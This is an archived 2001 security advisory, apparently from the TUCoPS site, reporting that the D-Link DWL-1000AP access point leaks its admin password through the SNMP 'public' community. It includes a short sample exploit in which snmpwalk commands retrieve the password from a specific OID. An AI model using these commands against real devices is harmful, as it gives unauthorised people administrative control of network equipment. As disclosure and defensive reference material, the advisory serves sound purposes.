TUCoPS :: Network Appliances :: napl4955.htm

D-Link public snmp reveals admin password
24th Dec 2001 [SBWID-4955]
COMMAND

	D-Link public snmp reveals admin password

SYSTEMS AFFECTED

	D-Link DWL-1000AP

PROBLEM

	Jonathan Strine reported :
	

	Admin  password  is  readable  via  SNMP  \"public\"  community  in  OID
	1.3.6.1.4.1.937.2.1.2.2.0 as a string value
	

	 Update (25 January 2002)

	 ======

	

	Sample exploit :
	

	The bug in the access point only reveals the password if you call for it by

	doing a snmp walk which uses a next request to get the oid instead of

	calling it explicitly.  I tried:

	

	#snmpget 192.168.0.10 public enterprises.937.2.1.2.2.0

	enterprises.937.2.1.2.2.0 = \"\"

	

	#snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2.0

	enterprises.937.2.1.2.2.0 = \"\"

	

	Both explicit calls to the oid fail but if I use next to call that oid I get

	

	#snmpwalk 192.168.0.10 public enterprises.937.2.1.2.2

	enterprises.937.2.1.2.2.0 = \"mypw\"

	

SOLUTION

	Vendors sees no problem

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH